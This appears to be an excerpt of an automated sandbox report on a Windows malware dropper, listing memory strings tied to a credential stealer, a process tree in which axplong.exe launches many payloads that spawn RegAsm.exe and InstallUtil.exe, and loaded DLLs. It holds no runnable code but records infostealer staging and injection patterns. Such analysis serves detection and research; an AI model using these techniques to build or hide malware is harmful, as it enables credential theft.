0000001F.00000002.3109509336.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

Virustotal: Detection: 56%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe "C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe "C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe "C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe	Process created: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp "C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp" /SL5="$8045C,2980754,56832,C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Process created: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe "C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe" -i
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe "C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe "C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe "C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe	Process created: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp "C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp" /SL5="$8045C,2980754,56832,C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Process created: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe "C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe" -i
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
